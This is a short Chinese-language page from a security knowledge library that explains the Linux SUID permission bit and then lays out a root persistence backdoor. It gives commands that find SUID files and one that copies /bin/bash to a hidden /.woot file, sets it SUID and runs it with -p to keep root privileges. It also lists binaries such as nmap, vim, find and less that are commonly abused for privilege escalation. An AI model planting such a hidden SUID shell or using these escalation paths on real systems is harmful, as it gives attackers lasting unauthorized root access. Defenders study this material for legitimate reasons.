suid 后门

suid说明:

  1. 用户或属主对应的前三位权限的x位上如果有s就表示suid权限。当x位上没有小写x执行权限的时候,suid的权限显示的就是大S。
  1. suid作用是让普通用户可以以root(或其他)的用户角色运行只有root(或其他)账号才能运行的程序或命令,或程序命令对应本来没有权限操作的文件等。

先查找具有suid的文件:

find / -perm +4000 -ls
find . -perm /4000
find / -user root -perm -4000 -print 2>/dev/null

将具有suid的复制到指定目录,然后再给权限执行。

cp /bin/bash /.woot
chmod 4755 /.woot
/.woot -p

image

列出一些具有suid权限的文件、然后利用一些二进制文件的特性来执行额外的命令。

Nmap
Vim
find
Bash
More
Less
Nano
cp

常见的suid提权的程序。

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-03-11 20:20:50

results matching ""

    No results matching ""